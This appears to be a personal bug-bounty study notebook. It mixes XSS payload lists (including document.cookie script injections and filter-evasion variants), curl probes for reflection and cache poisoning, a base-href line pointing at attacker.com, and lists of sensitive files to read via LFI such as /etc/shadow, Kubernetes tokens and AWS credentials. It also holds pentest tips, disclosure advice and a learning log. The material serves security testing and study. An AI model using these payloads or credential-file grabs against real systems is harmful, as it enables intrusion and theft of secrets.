int0x33 / 420 (Automated XSS Vulnerability Finder)
XSS Chef (generate HTML and script payloads to order)

Payloads, mostly:

Code to put (one at a time) into URL parameters and form fields, and see if they execute or come back in the page source:
"><h1>test</h1>
<iframe src=javascript:alert(1)>
'+alert(1)+'
';alert(1)//
\';alert(1)//
${alert(1)}
"onmouseover="alert(1)
" autofocus onfocus=alert(1) x="
http://"onmouseover="alert(1)
<marquee onstart=alert(1)>test</marquee>
"><script>alert(document.cookie)</script>
"><script >alert(document.cookie)</script >
"><ScRiPt>alert(document.cookie)</ScRiPt>
"%3e%3cscript%3ealert(document.cookie)%3c/script%3e
"><scr<script>ipt>alert(document.cookie)</scr</script>ipt>
%00"><script>alert(document.cookie)</script>
" onclick=alert(1)//<button ‘ onclick=alert(1)//> */ alert(1)//
# fake URL param "foo":
?realparam=1&foo=bar'+alert(/XSS/)+'
EdOverflow / bugbounty-cheatsheet / xss.md
RSnake's "XSS cheatsheet"
OWASP's "XSS Filter Evasion Cheat Sheet"
int0x33's "XSS Payloads, getting past alert(1)"
XSS Payloads
Jack Masa's XSS Mindmap
Pgaijin66 / XSS-Payloads
0xSobky / HackVault / Unleashing an Ultimate XSS Polyglot
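
A crude first-pass reflection check for a hypothetical search parameter: send a marker string wrapped in one of the simple payloads above and see whether it comes back unencoded in the page source, before spending time on the fancier payloads:

# Hypothetical reflected parameter; an unencoded <h1> in the output means the payload survived.
payload='"><h1>xss3492</h1>'
curl -s -G 'https://target.example/search' --data-urlencode "q=$payload" | grep -n 'xss3492'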

Paraphrased from Chapter 12 "Attacking Users: Cross-Site Scripting" in "The Web Application Hacker's Handbook" by Stuttard and Pinto (on Amazon):

You can introduce script code into an HTML page in four broad ways. Also, you can change the base path used for relative URLs:
<base href="http://attacker.com/badscripts/">
...
<script src="goodscript.js"></script>


Cross-Site Leaking (XS-Leak, XS-Search):
A new and growing set of techniques, where code from one site finds out information about activity from another site. For example, clear browser cache, have user load a page, see if a certain image appears in the cache.

James Walker's "New XS-Leak techniques reveal fresh ways to expose user information"

File Inclusion (LFI, RFI):
This could cause "file execution" or "file viewing".

For execution: Some languages let the server-side scripting do an "include" of a file's contents into the executable of the script. Trick the code into using your file, or rewrite the contents of the file it already uses.

For viewing: Where the code expects the path of some user-uploaded file (such as a CV/resume, or a message attachment), give it the path of some app or system file (such as /etc/passwd).

Good files to get on Linux: /etc/passwd, /etc/shadow, /proc/version, /proc/self/version, /proc/sched_debug, /proc/mounts.

There are several different ways to accomplish this:

If you can change the filename used, you can change it to the name of a:
URL parameters likely to do a file inclusion:

Wikipedia's "File inclusion vulnerability"
EdOverflow / bugbounty-cheatsheet / LFI
Asfiya Shaikh's "File Path Traversal and File Inclusions"
Jean Fleury's "Finally, My First Bug Bounty Write Up (LFI)"
George Mauer's "The Absurdly Underestimated Dangers of CSV Injection"
LFI/RFI articles in Hacking Articles' "Web Penetration Testing"
OWASP's "Testing for Local File Inclusion"
OWASP's "Testing for Remote File Inclusion"
WASC's "Remote File Inclusion"
Kevin Burns' "Directory Traversal, File Inclusion, and The Proc File System"
Arr0way's "LFI Cheat Sheet"

From Bbinfosec's "Collection Of Bug Bounty Tip - Will Be updated daily":
"If you find a LFI, ignore /etc/passwd and go for /var/run/secrets/kubernetes.io/serviceaccount This will raise the severity when you hand them a Kubernetes token or cert." [Also look for ~/.aws/credentials]



Insecure CORS (Cross Origin Resource Sharing):
Browsers enforce "same-origin policy", which means a resource can be accessed from a page only if protocols (HTTP, HTTPS) match, port numbers (80, 443, etc) match, and domains match exactly. But developers can weaken this by using messaging (postMessage), or by changing document.domain in the DOM, or by using CORS (XMLHttpRequests to domains outside your origin, using special headers).

Access-Control-Allow-Origin
wikipedia's "Cross-origin resource sharing"
James Kettle's "Exploiting CORS misconfigurations for Bitcoins and bounties"
Geekboy's "Exploiting Misconfigured CORS (Cross Origin Resource Sharing)"
Suyog Palav's "Exploitation of Mis-configured Cross-Origin Resource Sharing (CORS)"
Muhammad Khizer Javed's "Exploiting Insecure Cross Origin Resource Sharing (CORS)"
Brute's "Cross-Origin Scripting"



Cookie Tampering:
Edit application's cookie on the client side, to see what happens if you delete or add or modify components/parameters. Use Firefox's development tools, or use Burp to catch the response headers and modify the cookie there. You need to catch the setting of the cookie, the first time that is done.

Try changing the order of parameters in the cookie, or adding duplicate parameters, to see what happens. Set illegal values, or additional parameters with new names. If you get errors back from the web/app server, that could give you useful info.

An app should be setting the HttpOnly and Secure flags on the cookie. If HttpOnly isn't set, client-side JavaScript can read and modify the cookie. If Secure isn't set, the cookie will be sent over plain HTTP as well as HTTPS.

If you see any encoded data in the cookie, definitely try to decode it, it should be something important. If it ends in "=" or contains "/", it's probably Base64 encoded. If it's all hex digits, usually all-uppercase or all-lowercase, it's probably hex-encoded. 32-40 nybbles of hex, probably a hash.
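
Some one-liners for poking at an encoded value (the values here are made-up examples):

# Base64-looking value? Decode it:
echo 'dXNlcj1hbGljZTtyb2xlPXVzZXI=' | base64 -d      # -> user=alice;role=user
# Hex-looking value? Decode it:
echo '757365723d616c696365' | xxd -r -p; echo        # -> user=alice
# 32 hex digits is probably MD5, 40 probably SHA-1; try them against wordlists offline.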

It's not a vuln if you can copy a cookie between two sessions that you started for different users, and suddenly user2 has the permissions of user1. It is a vuln if you can get that to happen without having access to both machines/browsers.

Hacker101 - Cookie Tampering Techniques (video)



Wordpress:
Ceos3c's "How to hack a WordPress Website"
Sebastian Vargas's "Hardening WordPress Like a Boss"
Hacking Articles' "WordPress Penetration Testing using WPScan & Metasploit"
Wordpress articles in Hacking Articles' "Web Penetration Testing"
Brute's "Compromising CMSes with XSS"
See WordPress tools section.



CMS:
Brute's "Compromising CMSes with XSS"



Apache:
OccupyTheWeb's "Linux Basics for the Aspiring Hacker, Part 11 (Apache Web Servers)"
OccupyTheWeb's "Linux Basics for the Aspiring Hacker: Configuring Apache"



Application logic attacks:
There is no magic cheatsheet for this kind of attack/exploit. You have to study the application and try to do unexpected things.

For some examples, see Chapter 11 "Attacking Application Logic" in "The Web Application Hacker's Handbook" by Stuttard and Pinto (on Amazon).



Client-Side SQL Injection / Local Storage:
HTML5 supports client-side SQL databases, which applications can use to store data on the client.

Maybe explore what is stored there for the attacker-as-normal-user, and see how the client-side code manipulates it. Look for places where URL parameters or user input get into the database. Then try to do a sort of "reflected SQL injection", where parameters given to user result in SQL that extracts data and sends it to attacker ?

See Chapter 13 "Attacking Users: Other Techniques" in "The Web Application Hacker's Handbook" by Stuttard and Pinto.


Flash, Silverlight, and Internet Explorer have their own local storage mechanisms.

HTML5 has local storage mechanisms.
tutorialspoint's "HTML5 - Web Storage"



Macro Mosaic's "Hack SAML Single Sign-on with Burp Suite"

Barrow's "Use Remote Port Forwarding to Slip Past Firewall Restrictions Unnoticed"

CrackerHacker's "Upload a Shell to a Web Server and Get Root (RFI): Part 1"
CrackerHacker's "Upload a Shell to a Web Server and Get Root (RFI): Part 2"

Ceos3c's "Obtaining Domain Credentials through a Printer with Netcat"
Printer Exploitation Toolkit

Weird forms of IP address (overflows, different bases, etc) or domain name, to get past a blacklist or filter. Called "URL obfuscation" ?

Cache poisoning: if there is a cache between clients and the server, send HTTP request headers such as X-Host, X-Forwarded-Host, X-Original-Url, and X-Rewrite-URL so that the cache stores a response containing your malicious data and serves it to other users. You need to know which headers and parameters are used in cache matching (which are in the cache key). Use the Param Miner extension for Burp.
portswigger.net/blog/practical-web-cache-poisoning
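
A rough manual probe, assuming the cache keys only on the URL: request a throwaway URL (the cb= cache-buster keeps this away from pages real users get) with a candidate unkeyed header, then fetch the same URL again without the header and see whether your value was cached:

# Seed the cache with a candidate unkeyed header, then re-fetch plainly and look for the value.
curl -s -i -H 'X-Forwarded-Host: evil.attacker.example' 'https://target.example/?cb=test123' | head -n 30
curl -s -i 'https://target.example/?cb=test123' | grep -i -e 'evil.attacker.example' -e '^x-cache'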

Some ways of transferring a file to a target: FTP, SFTP, TFTP, SCP, WebDAV, shell (run netcat or ncat or something), file-share (NFS, Samba, etc), web app's Upload/Attachment features, object API (SOAP, REST) over HTTP.

Some ways of connecting to a target: HTTP, Telnet, RDP, SSH, VNC, TeamViewer.

EdOverflow / bugbounty-cheatsheet / CRLF Injection || HTTP Response Splitting

EdOverflow / bugbounty-cheatsheet / Open Redirect

Jayson Grace's "Web Application Penetration Testing Notes"
Jayson Grace's "Pentesting notes and snippets"
Arr0way's "Penetration Testing Tools Cheat Sheet"
Raj Chandel's "Hacking Articles"

swisskyrepo / PayloadsAllTheThings

amanvir's "Security Issues in Modern JavaScript"

Shankar R's "Bug Hunting Methodology(Part-3)" (tips and snippets)



When you think you've found a bug:
Gather as much sensitive data as you can. Can you list all users ? Get passwords for user accounts or for accounts on other systems or services ? Get log files ? Get configuration files that show other network devices ? Get PII for users ? Get version numbers of OS and software ? Get encrypted files to try to crack later ?

Can you use this to do another exploit, a better one ?

Kunal Pandey's "Avoid rookie mistakes and progress positively in bug bounty"

Does the same bug exist in other apps that use the same module ?
Offensive Security by Automation's "Open Redirection: A Case Study"


Interesting thoughts: LiveOverflow's "What is a Security Vulnerability?" (video)







Attack Tips and Tactics





Quick try at a site, from Jason Haddix's "How To Shot Web" (PDF):
  1. Visit the search, registration, contact, password reset, and comment forms and hit them with your polyglot (XSS) strings.

  2. Scan those specific functions with Burp's built-in scanner.

  3. Check your cookie, log out, check cookie, log in, check cookie. Submit old cookie, see if access.

  4. Perform user enumeration checks on login, registration, and password reset.

  5. Do a reset and see if: the password comes back in plaintext, the reset uses a URL-based token, the token is predictable, the token can be used multiple times, or the reset logs you in automatically.

  6. Find numeric account identifiers anywhere in URLs and rotate them for context change.

  7. Find the security-sensitive function(s) or files and see if vulnerable to non-auth browsing (IDORs), lower-auth browsing, CSRF, CSRF protection bypass, and see if they can be done over HTTP.

  8. Directory brute for top short list on SecLists.

  9. Check upload functions for alternate file types that can execute code (XSS or PHP etc).



From /u/Metasploit-Ninja on reddit 1/2019:

Re: misconfigurations:

For pentesting, the vast majority of findings you come across are misconfigurations. Could be screw ups in group policy or bad password policies, etc but I see a lot of things like default creds for web instances like Apache Tomcat (tomcat:tomcat or admin:admin), etc.

I also see a lot of misconfigurations in Vmware Enterprise setups where a customer will have a PCI-DSS/CDE network that is supposed to be segmented from the regular enterprise/production network but isn't fully. For example, there might be a vSphere/vCenter instance that connects to all the VMware Hosts and the customer might have a host for just PCI and others for their regular production network but the vCenter/vSphere can connect to all of them. So if you compromised credentials like a VMware admin in the regular production network, you can just use vCenter/vSphere to jump into a PCI/CDE host then compromise the VMs or even take a snapshot of the VMs you want and download them from the datastore. I see this in a LOT of different places and people don't even think about it. They just see how info flows physically and logically but not how it flows virtually.

Also, I'll see two-factor setups with things like 2FA Duo where they have it set to "open" if the user getting the 2FA request doesn't press anything. This is because Duo communicates via cloud and if something happens to the connection, you can't login to critical systems so by default it fails open. If you have a fairly stable connection, you wouldn't want it that way. If an attacker gets creds and tries to login lets say at 3am and you are sleeping, it would time out and they would then get in without you pressing anything. Oops.

I also see a lot of OWA instances where you can enumerate users because of timing attack vulnerabilities associated with their instance. For example, if you gather a list of users from LinkedIn, social media sites, Google, etc, you can create a list and throw it against the OWA server and if the user is actually present, it will usually respond back with a valid/invalid error after 0.2 seconds. If the user doesn't exist in Active Directory, it will respond back after ~13-15 seconds. See Metasploit module auxiliary/scanner/http/owa_login for info on that and options.

I could go on but those are common ones I see all the time.



Sean's "One company: 262 bugs, 100% acceptance, 2.57 priority, millions of user details saved"
Craig Hays' "Bug Bounty Hunting Tips #1 - Always read the source code"
EdOverflow / bugbounty-cheatsheet / bugbountytips.md
Bugcrowd forum discussion "How do you approach a target?"
Jean Fleury's "So You Want To Become a Bug Bounty Hunter?"
Aakash Choudhary's "Bug-Hunting-Tips/Tricks"







Miscellaneous



Lots of hackers and bounty-hunters are on Twitter; that seems to be the standard way to communicate. But I don't like Twitter, and I have no need to get the latest news right away. Better to read articles and books and documentation, learn tools and techniques, try challenges.



If you find a bug by accident:

If you're not in a bug-bounty program (maybe the company doesn't even have such a program), and you find a serious security bug:

Do NOT just release the bug information into the wild.

If you actively worked to find the vulnerability, you may have violated the law.

See Reporting section for advice about replicating and documenting the bug.


Contacting the company:
Make sure you really ARE talking to a company representative. Don't just report to some guy who pops up on reddit or something saying "yeah, I'm from company X, tell me all about the vulnerability".

One way to verify a contact if you're not sure: get them to put some hidden file (containing a code you give them) on the company's main web site.

The company may accept the report gracefully, or they may be hostile and/or call law-enforcement.

Instead of contacting the company directly, you could contact:

New process for open-source components: Bruce Mayhew's "Sonatype and HackerOne eliminate the pain of reporting open source software vulnerabilities"


Things probably will go smoother if you don't ask for money, just leave it up to the company to decide if they want to reward you. If you do ask for money, keep the amount reasonable. But whichever way you decide, I would be open about that pretty early in the process, as soon as you get into contact with security-type people.

Don't expect an instant response. You're an unknown guy coming in on a non-standard channel, not part of any program. They see a lot of scammers and false alarms, and they're busy with other work.



Questions/issues:




Done so far:
  1. Started 12/2018. Tons of reading.

  2. Made a live-session Kali image on USB flash drive:

    1. Downloaded Kali 2018.4 ISO and used Mint "Disks" app to write to flash drive.

    2. Added persistence by doing in CLI (per Kali Linux Live USB Persistence):
      
      end=7gb
      read start _ < <(du -bcm kali-linux-2018.4-amd64.iso | tail -1); echo $start
      sudo parted /dev/sdc mkpart primary $start $end
      sudo mkfs.ext3 -L persistence /dev/sdc3
      sudo e2label /dev/sdc3 persistence
      sudo mkdir -p /mnt/my_usb
      sudo mount /dev/sdc3 /mnt/my_usb
      cd /mnt/my_usb
      # had to do   sudo chmod 777 .   to make next line work
      sudo echo "/ union" >persistence.conf
      # sudo chmod 755 .   to restore permissions to original
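      # (alternative that avoids the chmod workaround:  echo "/ union" | sudo tee persistence.conf)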
      cd ~
      sudo umount /dev/sdc3
      

  3. Booted from Kali live session USB, selecting "Live (forensic mode)", which means hard disk will not be touched. Booting got stuck for a couple of minutes waiting for "LSB - thin initscript". Login password is "toor", but I wasn't asked for it.

    Distro has lots of tools installed; doesn't have OpenVAS. Has Burp Community Edition.

  4. Tested, and "Live (forensic mode)" doesn't have persistence. "Live with persistence" mode does have persistence. Both modes usually spend minutes waiting for "LSB - thin initscript" at boot time.

  5. Was going to install OpenVAS on Kali, but the live session is just too slow at everything.

  6. Tried to install OpenVAS on my normal Mint desktop; see OpenVAS section. Finally gave up.

  7. Joined HackerOne and Bugcrowd.

  8. Installed Burp Suite CE and got the basics working.

  9. More tons of reading.

  10. Upgraded my laptop's RAM from 3 GB to 8 GB, so I can run VMs etc. And just have a faster machine in general.

  11. Installed VirtualBox and a Xubuntu VM and learned a bit about that.

  12. Tried to install Dradis, got stuck. Support not helpful.

  13. Started doing challenges on hacker101, quickly got stuck and feeling like an idiot. Worked through it over the next week or so, skipping to other challenges when I got stuck.

  14. Installed OWASP ZAP and got the basics working.

  15. 2/2019: Did some Hacker101 CTF's and got to a level where I got an invitation from a private program. It was a VDP (no money) program. Declined invitation because I think my skills are not good enough yet.

  16. Started on OverTheWire Bandit, got stuck at 21, trying to find the port something is listening on.

  17. 3/2019: Got sidetracked into creating a desktop app to do bounty-hunting project management. I want the app, but also it's an excuse to learn Bootstrap, ng-bootstrap, Angular, Electron, (already knew a bit about) Node.js, (already knew a bit about) SQL.

  18. Gave up on app development in Angular, changed to Java.

  19. Started on Portswigger's "Web Security Academy"





